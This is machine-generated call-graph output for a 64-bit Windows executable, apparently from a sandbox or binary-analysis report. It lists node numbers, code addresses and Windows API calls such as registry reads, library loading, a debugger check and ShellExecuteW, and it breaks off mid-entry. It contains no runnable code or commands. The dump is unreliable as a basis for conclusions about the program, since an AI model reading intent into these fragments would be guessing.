93881 7ff73a1dee20 VariantClear RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 93866->93881 93867 7ff73a1f4c68 4 API calls 93875 7ff73a1e22a5 memcpy_s 93867->93875 93868->93860 93868->93861 93868->93864 93871 7ff73a1e2244 93868->93871 93868->93874 93868->93875 93870 7ff73a22d062 93882 7ff73a1dee20 VariantClear RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 93870->93882 93871->93874 93879 7ff73a1e1ce4 165 API calls 93871->93879 93874->93866 93876 7ff73a2534e4 77 API calls 93874->93876 93880 7ff73a1d4a60 164 API calls 93874->93880 93875->93867 93875->93874 93876->93874 93878->93848 93879->93875 93880->93874 93881->93870 93882->93861 93883->93863 93884 7ff73a1f5328 93907 7ff73a1f4cac 93884->93907 93887 7ff73a1f5474 93939 7ff73a1f57e4 7 API calls 2 library calls 93887->93939 93888 7ff73a1f5344 93890 7ff73a1f547e 93888->93890 93892 7ff73a1f5362 93888->93892 93940 7ff73a1f57e4 7 API calls 2 library calls 93890->93940 93893 7ff73a1f5387 93892->93893 93897 7ff73a1f53a4 __scrt_is_nonwritable_in_current_image __scrt_release_startup_lock 93892->93897 93915 7ff73a20ada4 93892->93915 93895 7ff73a1f5489 abort 93896 7ff73a1f540d 93922 7ff73a1f5930 93896->93922 93897->93896 93936 7ff73a1f9204 35 API calls __InternalCxxFrameHandler 93897->93936 93899 7ff73a1f5412 93925 7ff73a1d3730 93899->93925 93904 7ff73a1f5435 93904->93895 93938 7ff73a1f4e90 8 API calls 2 library calls 93904->93938 93906 7ff73a1f544c 93906->93893 93908 7ff73a1f4cce __scrt_initialize_crt 93907->93908 93941 7ff73a1f65ec 93908->93941 93911 7ff73a1f4cd7 93911->93887 93911->93888 93916 7ff73a20adff 93915->93916 93917 7ff73a20ade0 93915->93917 93916->93897 93917->93916 93990 7ff73a1d10e8 93917->93990 93995 7ff73a1d1064 93917->93995 94000 7ff73a1d1080 93917->94000 94005 7ff73a1d1048 93917->94005 94203 7ff73a1f6240 93922->94203 93926 7ff73a1d3743 IsThemeActive 93925->93926 93927 7ff73a1d37a3 93925->93927 94205 7ff73a1f92d0 93926->94205 93937 7ff73a1f5974 GetModuleHandleW 93927->93937 93933 7ff73a1d377d 94217 7ff73a1d37b0 93933->94217 93935 7ff73a1d3785 SystemParametersInfoW 93935->93927 93936->93896 93937->93904 93938->93906 93939->93890 93940->93895 93942 7ff73a1f65f5 __vcrt_initialize_winapi_thunks __vcrt_initialize 93941->93942 93954 7ff73a1f7290 93942->93954 93945 7ff73a1f4cd3 93945->93911 93949 7ff73a20ac84 93945->93949 93947 7ff73a1f660c 93947->93945 93961 7ff73a1f72d8 DeleteCriticalSection 93947->93961 93951 7ff73a214340 93949->93951 93950 7ff73a1f4ce0 93950->93911 93953 7ff73a1f6620 8 API calls 3 library calls 93950->93953 93951->93950 93978 7ff73a20dd2c 93951->93978 93953->93911 93955 7ff73a1f7298 93954->93955 93957 7ff73a1f72c9 93955->93957 93958 7ff73a1f65ff 93955->93958 93962 7ff73a1f7614 93955->93962 93967 7ff73a1f72d8 DeleteCriticalSection 93957->93967 93958->93945 93960 7ff73a1f7218 8 API calls 3 library calls 93958->93960 93960->93947 93961->93945 93968 7ff73a1f7310 93962->93968 93965 7ff73a1f7654 93965->93955 93966 7ff73a1f765f InitializeCriticalSectionAndSpinCount 93966->93965 93967->93958 93969 7ff73a1f7371 93968->93969 93976 7ff73a1f736c try_get_function 93968->93976 93969->93965 93969->93966 93970 7ff73a1f7454 93970->93969 93973 7ff73a1f7462 GetProcAddress 93970->93973 93971 7ff73a1f73a0 LoadLibraryExW 93972 7ff73a1f73c1 GetLastError 93971->93972 93971->93976 93972->93976 93974 7ff73a1f7473 93973->93974 93974->93969 93975 7ff73a1f7439 FreeLibrary 93975->93976 93976->93969 93976->93970 93976->93971 93976->93975 93977 7ff73a1f73fb LoadLibraryExW 93976->93977 93977->93976 93989 7ff73a20b9bc EnterCriticalSection 93978->93989 93980 7ff73a20dd3c 93981 7ff73a20e258 32 API calls 93980->93981 93982 7ff73a20dd45 93981->93982 93984 7ff73a20db44 34 API calls 93982->93984 93988 7ff73a20dd53 93982->93988 93983 7ff73a20ba10 _isindst LeaveCriticalSection 93985 7ff73a20dd5f 93983->93985 93986 7ff73a20dd4e 93984->93986 93985->93951 93987 7ff73a20dc30 GetStdHandle GetFileType 93986->93987 93987->93988 93988->93983 94010 7ff73a1f1d80 93990->94010 93994 7ff73a1f4f15 93994->93917 94035 7ff73a1d7ec0 93995->94035 93997 7ff73a1d106d 94071 7ff73a1f4ebc 34 API calls _onexit 93997->94071 93999 7ff73a1f4f15 93999->93917 94120 7ff73a1d7920 94000->94120 94002 7ff73a1d109e 94150 7ff73a1f4ebc 34 API calls _onexit 94002->94150 94004 7ff73a1f4f15 94004->93917 94184 7ff73a1d7718 94005->94184 94009 7ff73a1f4f15 94009->93917 94011 7ff73a1d9640 4 API calls 94010->94011 94012 7ff73a1f1db2 GetVersionExW 94011->94012 94013 7ff73a1d7cf4 4 API calls 94012->94013 94015 7ff73a1f1dfc 94013->94015 94014 7ff73a1ddda4 4 API calls 94014->94015 94015->94014 94016 7ff73a1f1e87 94015->94016 94017 7ff73a1ddda4 4 API calls 94016->94017 94018 7ff73a1f1ea4 94017->94018 94019 7ff73a239645 94018->94019 94020 7ff73a1f1f3c GetCurrentProcess IsWow64Process 94018->94020 94022 7ff73a23964f 94019->94022 94021 7ff73a1f1f7e memcpy_s 94020->94021 94021->94022 94023 7ff73a1f1f86 GetSystemInfo 94021->94023 94033 7ff73a2432f4 LoadLibraryA GetProcAddress 94022->94033 94026 7ff73a1d10f1 94023->94026 94025 7ff73a2396b1 94027 7ff73a2396d7 GetSystemInfo 94025->94027 94028 7ff73a2396b5 94025->94028 94032 7ff73a1f4ebc 34 API calls _onexit 94026->94032 94030 7ff73a2396bf 94027->94030 94034 7ff73a2432f4 LoadLibraryA GetProcAddress 94028->94034 94030->94026 94031 7ff73a2396f0 FreeLibrary 94030->94031 94031->94026 94032->93994 94033->94025 94034->94030 94072 7ff73a1d82b4 94035->94072 94038 7ff73a1d82b4 4 API calls 94039 7ff73a1d7f3a 94038->94039 94040 7ff73a1d9640 4 API calls 94039->94040 94041 7ff73a1d7f46 94040->94041 94042 7ff73a1d7cf4 4 API calls 94041->94042 94043 7ff73a1d7f59 94042->94043 94079 7ff73a1f2d5c 6 API calls 94043->94079 94045 7ff73a1d7fa5 94046 7ff73a1d9640 4 API calls 94045->94046 94047 7ff73a1d7fb1 94046->94047 94048 7ff73a1d9640 4 API calls 94047->94048 94049 7ff73a1d7fbd 94048->94049 94050 7ff73a1d9640 4 API calls 94049->94050 94051 7ff73a1d7fc9 94050->94051 94052 7ff73a1d9640 4 API calls 94051->94052 94053 7ff73a1d800f 94052->94053 94054 7ff73a1d9640 4 API calls 94053->94054 94055 7ff73a1d80f7 94054->94055 94080 7ff73a1eef88 94055->94080 94057 7ff73a1d8103 94087 7ff73a1eeec8 94057->94087 94059 7ff73a1d812f 94060 7ff73a1d9640 4 API calls 94059->94060 94061 7ff73a1d813b 94060->94061 94098 7ff73a1e6d40 94061->94098 94065 7ff73a1d81ac 94066 7ff73a1d81be GetStdHandle 94065->94066 94067 7ff73a1d8220 OleInitialize 94066->94067 94068 7ff73a21d350 94066->94068 94067->93997 94115 7ff73a24ffc8 CreateThread 94068->94115 94070 7ff73a21d367 CloseHandle 94071->93999 94073 7ff73a1d9640 4 API calls 94072->94073 94074 7ff73a1d82c6 94073->94074 94075 7ff73a1d9640 4 API calls 94074->94075 94076 7ff73a1d82cf 94075->94076 94077 7ff73a1d9640 4 API calls 94076->94077 94078 7ff73a1d7f2e 94077->94078 94078->94038 94079->94045 94081 7ff73a1d9640 4 API calls 94080->94081 94082 7ff73a1eefa3 94081->94082 94083 7ff73a1d9640 4 API calls 94082->94083 94084 7ff73a1eefac 94083->94084 94085 7ff73a1d9640 4 API calls 94084->94085 94086 7ff73a1ef02e 94085->94086 94086->94057 94088 7ff73a1eeede 94087->94088 94089 7ff73a1d9640 4 API calls 94088->94089 94090 7ff73a1eeeea 94089->94090 94091 7ff73a1d9640 4 API calls 94090->94091 94092 7ff73a1eeef6 94091->94092 94093 7ff73a1d9640 4 API calls 94092->94093 94094 7ff73a1eef02 94093->94094 94095 7ff73a1d9640 4 API calls 94094->94095 94096 7ff73a1eef0e 94095->94096 94097 7ff73a1eef68 RegisterWindowMessageW 94096->94097 94097->94059 94099 7ff73a1e6db9 94098->94099 94106 7ff73a1e6d80 94098->94106 94116 7ff73a1f5114 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 94099->94116 94107 7ff73a1d816b 94106->94107 94117 7ff73a1f5114 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 94106->94117 94108 7ff73a1f39a8 94107->94108 94109 7ff73a23a502 94108->94109 94113 7ff73a1f39cc 94108->94113 94118 7ff73a1dee20 VariantClear RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94109->94118 94111 7ff73a23a50e 94119 7ff73a1dee20 VariantClear RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94111->94119 94113->94065 94114 7ff73a23a52d 94115->94070 94118->94111 94119->94114 94121 7ff73a1d7948 wcsftime 94120->94121 94122 7ff73a1d9640 4 API calls 94121->94122 94123 7ff73a1d7a02 94122->94123 94151 7ff73a1d5680 94123->94151 94125 7ff73a1d7a0c 94158 7ff73a1f3a38 94125->94158 94128 7ff73a1d71f8 4 API calls 94129 7ff73a1d7a2c 94128->94129 94164 7ff73a1d4680 94129->94164 94131 7ff73a1d7a3d 94132 7ff73a1d9640 4 API calls 94131->94132 94133 7ff73a1d7a47 94132->94133 94168 7ff73a1da854 94133->94168 94136 7ff73a21d05c RegQueryValueExW 94137 7ff73a21d08f 94136->94137 94138 7ff73a21d131 RegCloseKey 94136->94138 94139 7ff73a1f4c68 4 API calls 94137->94139 94140 7ff73a1d7a83 94138->94140 94149 7ff73a21d147 wcscat 94138->94149 94141 7ff73a21d0b2 94139->94141 94140->94002 94142 7ff73a21d0bf RegQueryValueExW 94141->94142 94143 7ff73a21d0f3 94142->94143 94146 7ff73a21d112 94142->94146 94144 7ff73a1d7cf4 4 API calls 94143->94144 94144->94146 94145 7ff73a1d9d84 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94145->94149 94146->94138 94147 7ff73a1dec00 4 API calls 94147->94149 94148 7ff73a1d4680 4 API calls 94148->94149 94149->94140 94149->94145 94149->94147 94149->94148 94150->94004 94172 7ff73a218f90 94151->94172 94154 7ff73a1dec00 4 API calls 94155 7ff73a1d56b4 94154->94155 94174 7ff73a1d56d4 94155->94174 94157 7ff73a1d56c1 94157->94125 94159 7ff73a218f90 wcsftime 94158->94159 94160 7ff73a1f3a44 GetFullPathNameW 94159->94160 94161 7ff73a1f3a74 94160->94161 94162 7ff73a1d7cf4 4 API calls 94161->94162 94163 7ff73a1d7a1b 94162->94163 94163->94128 94165 7ff73a1d469f 94164->94165 94167 7ff73a1d46c8 memcpy_s 94164->94167 94166 7ff73a1f4c68 4 API calls 94165->94166 94166->94167 94167->94131 94169 7ff73a1da87a 94168->94169 94171 7ff73a1d7a51 RegOpenKeyExW 94168->94171 94170 7ff73a1f4c68 4 API calls 94169->94170 94170->94171 94171->94136 94171->94140 94173 7ff73a1d568c GetModuleFileNameW 94172->94173 94173->94154 94175 7ff73a218f90 wcsftime 94174->94175 94176 7ff73a1d56e9 GetFullPathNameW 94175->94176 94177 7ff73a21c03a 94176->94177 94178 7ff73a1d5712 94176->94178 94179 7ff73a1da854 4 API calls 94177->94179 94180 7ff73a1d7cf4 4 API calls 94178->94180 94181 7ff73a1d571c 94179->94181 94180->94181 94182 7ff73a1ddda4 4 API calls 94181->94182 94183 7ff73a1d5785 94182->94183 94183->94157 94185 7ff73a1d9640 4 API calls 94184->94185 94186 7ff73a1d778f 94185->94186 94192 7ff73a1d6f24 94186->94192 94188 7ff73a1d782c 94189 7ff73a1d1051 94188->94189 94195 7ff73a1d7410 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 94188->94195 94191 7ff73a1f4ebc 34 API calls _onexit 94189->94191 94191->94009 94196 7ff73a1d6f60 94192->94196 94195->94188 94197 7ff73a1d6f85 94196->94197 94199 7ff73a1d6f52 94196->94199 94198 7ff73a1d6f93 RegOpenKeyExW 94197->94198 94197->94199 94198->94199 94200 7ff73a1d6faf RegQueryValueExW 94198->94200 94199->94188 94201 7ff73a1d6ff5 RegCloseKey 94200->94201 94202 7ff73a1d6fdd 94200->94202 94201->94199 94202->94201 94204 7ff73a1f5947 GetStartupInfoW 94203->94204 94204->93899 94263 7ff73a20b9bc EnterCriticalSection 94205->94263 94207 7ff73a1f92e4 94208 7ff73a20ba10 _isindst LeaveCriticalSection 94207->94208 94209 7ff73a1d376e 94208->94209 94210 7ff73a1f9334 94209->94210 94211 7ff73a1d3778 94210->94211 94212 7ff73a1f933d 94210->94212 94216 7ff73a1d36e8 SystemParametersInfoW SystemParametersInfoW 94211->94216 94264 7ff73a2055d4 15 API calls _mbstowcs_s_l 94212->94264 94214 7ff73a1f9342 94265 7ff73a20b164 31 API calls _invalid_parameter_noinfo 94214->94265 94216->93933 94218 7ff73a1d37cd wcsftime 94217->94218 94219 7ff73a1d9640 4 API calls 94218->94219 94220 7ff73a1d37dd GetCurrentDirectoryW 94219->94220 94266 7ff73a1d57a0 94220->94266 94222 7ff73a1d3807 IsDebuggerPresent 94223 7ff73a1d3815 94222->94223 94224 7ff73a21b872 MessageBoxA 94222->94224 94225 7ff73a21b894 94223->94225 94226 7ff73a1d3839 94223->94226 94224->94225 94376 7ff73a1de278 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94225->94376 94340 7ff73a1d3f04 94226->94340 94230 7ff73a1d3860 GetFullPathNameW 94231 7ff73a1d7cf4 4 API calls 94230->94231 94232 7ff73a1d38a6 94231->94232 94356 7ff73a1d3f9c 94232->94356 94233 7ff73a1d38bf 94235 7ff73a21b8dc SetCurrentDirectoryW 94233->94235 94236 7ff73a1d38c7 94233->94236 94235->94236 94237 7ff73a1d38d0 94236->94237 94377 7ff73a23d540 AllocateAndInitializeSid CheckTokenMembership FreeSid 94236->94377 94372 7ff73a1d3b84 7 API calls 94237->94372 94240 7ff73a21b8f8 94240->94237 94243 7ff73a21b90c 94240->94243 94245 7ff73a1d5680 6 API calls 94243->94245 94244 7ff73a1d38da 94247 7ff73a1d6258 46 API calls 94244->94247 94251 7ff73a1d38ef 94244->94251 94246 7ff73a21b916 94245->94246 94248 7ff73a1dec00 4 API calls 94246->94248 94247->94251 94249 7ff73a21b927 94248->94249 94252 7ff73a21b94d 94249->94252 94253 7ff73a21b930 94249->94253 94250 7ff73a1d3913 94255 7ff73a1d391f SetCurrentDirectoryW 94250->94255 94251->94250 94254 7ff73a1d5d88 Shell_NotifyIconW 94251->94254 94258 7ff73a1d71f8 4 API calls 94252->94258 94256 7ff73a1d71f8 4 API calls 94253->94256 94254->94250 94257 7ff73a1d3934 94255->94257 94259 7ff73a21b93c 94256->94259 94257->93935 94260 7ff73a21b963 GetForegroundWindow ShellExecuteW 94258->94260 94378 7ff73a1d7c24 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94259->94378 94262 7ff73a21b99f 94260->94262 94262->94250 94264->94214 94265->94211 94267 7ff73a1d9640 4 API calls 94266->94267 94268 7ff73a1d57d7 94267->94268 94379 7ff73a1d9bbc 94268->94379 94270 7ff73a1d57fe 94271 7ff73a1d5680 6 API calls 94270->94271 94272 7ff73a1d5812 94271->94272 94273 7ff73a1dec00 4 API calls 94272->94273 94274 7ff73a1d5823 94273->94274 94393 7ff73a1d6460 94274->94393 94277 7ff73a21c05e 94466 7ff73a252948 94277->94466 94278 7ff73a1d584e 94282 7ff73a1de0a8 4 API calls 94278->94282 94280 7ff73a21c074 94281 7ff73a21c081 94280->94281 94283 7ff73a1d652c 63 API calls 94280->94283 94484 7ff73a1d652c 94281->94484 94284 7ff73a1d586a 94282->94284 94283->94281 94286 7ff73a1dec00 4 API calls 94284->94286 94287 7ff73a1d5888 94286->94287 94291 7ff73a21c099 94287->94291 94419 7ff73a1deff8 94287->94419 94289 7ff73a1d58ad 94290 7ff73a1dec00 4 API calls 94289->94290 94292 7ff73a1d58d7 94290->94292 94294 7ff73a1d5ab4 4 API calls 94291->94294 94292->94291 94293 7ff73a1deff8 46 API calls 94292->94293 94296 7ff73a1d58fc 94293->94296 94295 7ff73a21c0e1 94294->94295 94297 7ff73a1d5ab4 4 API calls 94295->94297 94299 7ff73a1d9640 4 API calls 94296->94299 94298 7ff73a21c103 94297->94298 94302 7ff73a1d5680 6 API calls 94298->94302 94300 7ff73a1d591f 94299->94300 94432 7ff73a1d5ab4 94300->94432 94304 7ff73a21c12b 94302->94304 94306 7ff73a1d5ab4 4 API calls 94304->94306 94308 7ff73a21c139 94306->94308 94307 7ff73a1d5941 94307->94291 94309 7ff73a1d5949 94307->94309 94310 7ff73a1de0a8 4 API calls 94308->94310 94311 7ff73a1f8e28 wcsftime 37 API calls 94309->94311 94312 7ff73a21c14a 94310->94312 94313 7ff73a1d5958 94311->94313 94314 7ff73a1d5ab4 4 API calls 94312->94314 94313->94295 94315 7ff73a1d5960 94313->94315 94316 7ff73a21c15b 94314->94316 94317 7ff73a1f8e28 wcsftime 37 API calls 94315->94317 94320 7ff73a1de0a8 4 API calls 94316->94320 94318 7ff73a1d596f 94317->94318 94318->94298 94319 7ff73a1d5977 94318->94319 94321 7ff73a1f8e28 wcsftime 37 API calls 94319->94321 94322 7ff73a21c172 94320->94322 94323 7ff73a1d5986 94321->94323 94324 7ff73a1d5ab4 4 API calls 94322->94324 94325 7ff73a1d59c6 94323->94325 94328 7ff73a1d5ab4 4 API calls 94323->94328 94327 7ff73a21c183 94324->94327 94325->94316 94326 7ff73a1d59d3 94325->94326 94455 7ff73a1ddf90 94326->94455 94329 7ff73a1d59a8 94328->94329 94330 7ff73a1de0a8 4 API calls 94329->94330 94331 7ff73a1d59b5 94330->94331 94333 7ff73a1d5ab4 4 API calls 94331->94333 94333->94325 94336 7ff73a1d5a12 94337 7ff73a1dd670 5 API calls 94336->94337 94338 7ff73a1d5ab4 4 API calls 94336->94338 94339 7ff73a1d5a60 94336->94339 94337->94336 94338->94336 94339->94222 94341 7ff73a1d3f29 wcsftime 94340->94341 94342 7ff73a21ba2c memcpy_s 94341->94342 94343 7ff73a1d3f4b 94341->94343 94345 7ff73a21ba4d GetOpenFileNameW 94342->94345 94344 7ff73a1d56d4 5 API calls 94343->94344 94346 7ff73a1d3f56 94344->94346 94347 7ff73a21bab0 94345->94347 94348 7ff73a1d3858 94345->94348 94828 7ff73a1d3eb4 94346->94828 94350 7ff73a1d7cf4 4 API calls 94347->94350 94348->94230 94348->94233 94352 7ff73a21babc 94350->94352 94354 7ff73a1d3f6c 94846 7ff73a1d6394 94354->94846 94357 7ff73a1d3fb6 wcsftime 94356->94357 94889 7ff73a1d9734 94357->94889 94359 7ff73a1d3fc4 94360 7ff73a1d4050 94359->94360 94899 7ff73a1d4d28 77 API calls 94359->94899 94360->94233 94362 7ff73a1d3fd3 94362->94360 94900 7ff73a1d4b0c 79 API calls 94362->94900 94364 7ff73a1d3fe0 94364->94360 94365 7ff73a1d3fe8 GetFullPathNameW 94364->94365 94366 7ff73a1d7cf4 4 API calls 94365->94366 94367 7ff73a1d4014 94366->94367 94368 7ff73a1d7cf4 4 API calls 94367->94368 94369 7ff73a1d4028 94368->94369 94370 7ff73a21bac2 wcscat 94369->94370 94371 7ff73a1d7cf4 4 API calls 94369->94371 94371->94360 94904 7ff73a1d3d90 7 API calls 94372->94904 94374 7ff73a1d38d5 94375 7ff73a1d3cbc CreateWindowExW CreateWindowExW ShowWindow ShowWindow 94374->94375 94376->94233 94377->94240 94378->94252 94380 7ff73a1d9be5 wcsftime 94379->94380 94381 7ff73a1d7cf4 4 API calls 94380->94381 94382 7ff73a1d9c1b 94380->94382 94381->94382 94389 7ff73a1d9c4a 94382->94389 94490 7ff73a1d9d84 94382->94490 94384 7ff73a1d9d21 94385 7ff73a1dec00 4 API calls 94384->94385 94390 7ff73a1d9d57 94384->94390 94386 7ff73a1d9d4a 94385->94386 94388 7ff73a1d4680 4 API calls 94386->94388 94387 7ff73a1dec00 4 API calls 94387->94389 94388->94390 94389->94384 94389->94387 94391 7ff73a1d4680 4 API calls 94389->94391 94392 7ff73a1d9d84 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94389->94392 94390->94270 94391->94389 94392->94389 94493 7ff73a1d6d64 94393->94493 94396 7ff73a1d64c0 94497 7ff73a2048e0 94396->94497 94397 7ff73a1d64ba FreeLibrary 94397->94396 94398 7ff73a1d6d64 2 API calls 94400 7ff73a1d649d 94398->94400 94400->94396 94400->94397 94402 7ff73a1d64db LoadLibraryExW 94516 7ff73a1d6cc4 94402->94516 94403 7ff73a21c8f6 94405 7ff73a1d652c 63 API calls 94403->94405 94406 7ff73a21c8fe 94405->94406 94408 7ff73a1d6cc4 3 API calls 94406->94408 94410 7ff73a21c907 94408->94410 94538 7ff73a1d67d8 94410->94538 94411 7ff73a1d6505 94411->94410 94412 7ff73a1d6512 94411->94412 94414 7ff73a1d652c 63 API calls 94412->94414 94416 7ff73a1d5846 94414->94416 94416->94277 94416->94278 94418 7ff73a21c93f 94741 7ff73a1e1a30 94419->94741 94421 7ff73a1df029 94422 7ff73a22a7a8 94421->94422 94423 7ff73a1df040 94421->94423 94757 7ff73a1dee20 VariantClear RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94422->94757 94426 7ff73a1f4c68 4 API calls 94423->94426 94425 7ff73a22a7bc 94427 7ff73a1df066 94426->94427 94429 7ff73a1df08f 94427->94429 94756 7ff73a1df0ec RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 94427->94756 94752 7ff73a1df1bc 94429->94752 94431 7ff73a1df0c6 94431->94289 94433 7ff73a1d5ae4 94432->94433 94434 7ff73a1d5ac6 94432->94434 94436 7ff73a1d7cf4 4 API calls 94433->94436 94435 7ff73a1de0a8 4 API calls 94434->94435 94437 7ff73a1d592d 94435->94437 94436->94437 94438 7ff73a1f8e28 94437->94438 94439 7ff73a1f8ea4 94438->94439 94440 7ff73a1f8e3f 94438->94440 94761 7ff73a1f8d98 35 API calls _mbstowcs_s_l 94439->94761 94450 7ff73a1f8e63 94440->94450 94759 7ff73a2055d4 15 API calls _mbstowcs_s_l 94440->94759 94443 7ff73a1f8ed6 94445 7ff73a1f8ee2 94443->94445 94447 7ff73a1f8ef9 94443->94447 94444 7ff73a1f8e49 94760 7ff73a20b164 31 API calls _invalid_parameter_noinfo 94444->94760 94762 7ff73a2055d4 15 API calls _mbstowcs_s_l 94445->94762 94452 7ff73a202c80 37 API calls wcsftime 94447->94452 94454 7ff73a1f8ef2 94447->94454 94449 7ff73a1f8e54 94449->94307 94450->94307 94451 7ff73a1f8ee7 94763 7ff73a20b164 31 API calls _invalid_parameter_noinfo 94451->94763 94452->94447 94454->94307 94456 7ff73a1ddfac 94455->94456 94457 7ff73a1f4c68 4 API calls 94456->94457 94458 7ff73a1d59f5 94456->94458 94457->94458 94459 7ff73a1dd670 94458->94459 94460 7ff73a1dd698 94459->94460 94464 7ff73a1dd6a2 94460->94464 94764 7ff73a1d880c RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94460->94764 94463 7ff73a229d43 94465 7ff73a1dd7de 94464->94465 94765 7ff73a1dee20 VariantClear RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94464->94765 94465->94336 94467 7ff73a2529c8 94466->94467 94766 7ff73a252b70 94467->94766 94470 7ff73a1d67d8 45 API calls 94471 7ff73a252a03 94470->94471 94472 7ff73a1d67d8 45 API calls 94471->94472 94473 7ff73a252a23 94472->94473 94474 7ff73a1d67d8 45 API calls 94473->94474 94475 7ff73a252a49 94474->94475 94476 7ff73a1d67d8 45 API calls 94475->94476 94477 7ff73a252a6d 94476->94477 94478 7ff73a1d67d8 45 API calls 94477->94478 94479 7ff73a252ac5 94478->94479 94480 7ff73a25240c 32 API calls 94479->94480 94481 7ff73a252ada 94480->94481 94483 7ff73a2529de 94481->94483 94771 7ff73a251d48 94481->94771 94483->94280 94485 7ff73a1d6542 94484->94485 94486 7ff73a1d653d 94484->94486 94488 7ff73a1d656f FreeLibrary 94485->94488 94489 7ff73a1d6558 94485->94489 94487 7ff73a204970 62 API calls 94486->94487 94487->94485 94488->94489 94489->94291 94491 7ff73a1da7c0 4 API calls 94490->94491 94492 7ff73a1d9d99 94491->94492 94492->94382 94494 7ff73a1d6d74 LoadLibraryA 94493->94494 94495 7ff73a1d6490 94493->94495 94494->94495 94496 7ff73a1d6d89 GetProcAddress 94494->94496 94495->94398 94495->94400 94496->94495 94498 7ff73a2047fc 94497->94498 94499 7ff73a20482a 94498->94499 94502 7ff73a20485c 94498->94502 94558 7ff73a2055d4 15 API calls _mbstowcs_s_l 94499->94558 94501 7ff73a20482f 94559 7ff73a20b164 31 API calls _invalid_parameter_noinfo 94501->94559 94504 7ff73a204862 94502->94504 94505 7ff73a20486f 94502->94505 94560 7ff73a2055d4 15 API calls _mbstowcs_s_l 94504->94560 94546 7ff73a20feb4 94505->94546 94509 7ff73a204883 94561 7ff73a2055d4 15 API calls _mbstowcs_s_l 94509->94561 94510 7ff73a204890 94553 7ff73a210304 94510->94553 94513 7ff73a2048a3 94562 7ff73a1fdf60 LeaveCriticalSection 94513->94562 94515 7ff73a1d64cf 94515->94402 94515->94403 94700 7ff73a1d6d1c 94516->94700 94519 7ff73a1d6d1c 2 API calls 94522 7ff73a1d6cf1 94519->94522 94520 7ff73a1d64f7 94523 7ff73a1d6580 94520->94523 94521 7ff73a1d6d0f FreeLibrary 94521->94520 94522->94520 94522->94521 94524 7ff73a1f4c68 4 API calls 94523->94524 94525 7ff73a1d65b5 memcpy_s 94524->94525 94526 7ff73a1d6740 CreateStreamOnHGlobal 94525->94526 94527 7ff73a21c9f5 94525->94527 94536 7ff73a1d6602 94525->94536 94529 7ff73a1d6759 FindResourceExW 94526->94529 94526->94536 94704 7ff73a252e00 45 API calls 94527->94704 94529->94536 94530 7ff73a21c97e LoadResource 94532 7ff73a21c997 SizeofResource 94530->94532 94530->94536 94531 7ff73a1d67d8 45 API calls 94531->94536 94534 7ff73a21c9ae LockResource 94532->94534 94532->94536 94533 7ff73a21c9fd 94535 7ff73a1d67d8 45 API calls 94533->94535 94534->94536 94537 7ff73a1d66e8 94535->94537 94536->94530 94536->94531 94536->94533 94536->94537 94537->94411 94539 7ff73a21ca6c 94538->94539 94540 7ff73a1d67f7 94538->94540 94705 7ff73a204c5c 94540->94705 94543 7ff73a25240c 94724 7ff73a252200 94543->94724 94545 7ff73a252430 94545->94418 94563 7ff73a20b9bc EnterCriticalSection 94546->94563 94548 7ff73a20fecb 94549 7ff73a20ff54 18 API calls 94548->94549 94550 7ff73a20fed6 94549->94550 94551 7ff73a20ba10 _isindst LeaveCriticalSection 94550->94551 94552 7ff73a204879 94551->94552 94552->94509 94552->94510 94564 7ff73a210040 94553->94564 94557 7ff73a21035e 94557->94513 94558->94501 94559->94515 94560->94515 94561->94515 94565 7ff73a21007d try_get_function 94564->94565 94565->94565 94575 7ff73a210211 94565->94575 94579 7ff73a1fdb68 37 API calls 3 library calls 94565->94579 94567 7ff73a2102de 94583 7ff73a20b164 31 API calls _invalid_parameter_noinfo 94567->94583 94569 7ff73a21021a 94569->94557 94576 7ff73a217738 94569->94576 94571 7ff73a210277 94571->94575 94580 7ff73a1fdb68 37 API calls 3 library calls 94571->94580 94573 7ff73a21029a 94573->94575 94581 7ff73a1fdb68 37 API calls 3 library calls 94573->94581 94575->94569 94582 7ff73a2055d4 15 API calls _mbstowcs_s_l 94575->94582 94584 7ff73a216d04 94576->94584 94579->94571 94580->94573 94581->94575 94582->94567 94583->94569 94585 7ff73a216d28 94584->94585 94586 7ff73a216d40 94584->94586 94638 7ff73a2055d4 15 API calls _mbstowcs_s_l 94585->94638 94586->94585 94588 7ff73a216d6d 94586->94588 94595 7ff73a217348 94588->94595 94589 7ff73a216d2d 94639 7ff73a20b164 31 API calls _invalid_parameter_noinfo 94589->94639 94593 7ff73a216d39 94593->94557 94641 7ff73a217078 94595->94641 94598 7ff73a2173bc 94673 7ff73a2055b4 15 API calls _mbstowcs_s_l 94598->94673 94599 7ff73a2173d3 94661 7ff73a20e418 94599->94661 94602 7ff73a2173c1 94674 7ff73a2055d4 15 API calls _mbstowcs_s_l 94602->94674 94604 7ff73a2173f7 CreateFileW 94608 7ff73a217469 94604->94608 94609 7ff73a2174eb GetFileType 94604->94609 94605 7ff73a2173df 94675 7ff73a2055b4 15 API calls _mbstowcs_s_l 94605->94675 94610 7ff73a2174b8 GetLastError 94608->94610 94615 7ff73a217478 CreateFileW 94608->94615 94612 7ff73a2174f8 GetLastError 94609->94612 94613 7ff73a217549 94609->94613 94677 7ff73a205564 15 API calls 2 library calls 94610->94677 94611 7ff73a216d95 94611->94593 94640 7ff73a20e3f4 LeaveCriticalSection 94611->94640 94678 7ff73a205564 15 API calls 2 library calls 94612->94678 94680 7ff73a20e334 16 API calls 2 library calls 94613->94680 94614 7ff73a2173e4 94676 7ff73a2055d4 15 API calls _mbstowcs_s_l 94614->94676 94615->94609 94615->94610 94619 7ff73a217507 CloseHandle 94619->94602 94621 7ff73a217539 94619->94621 94679 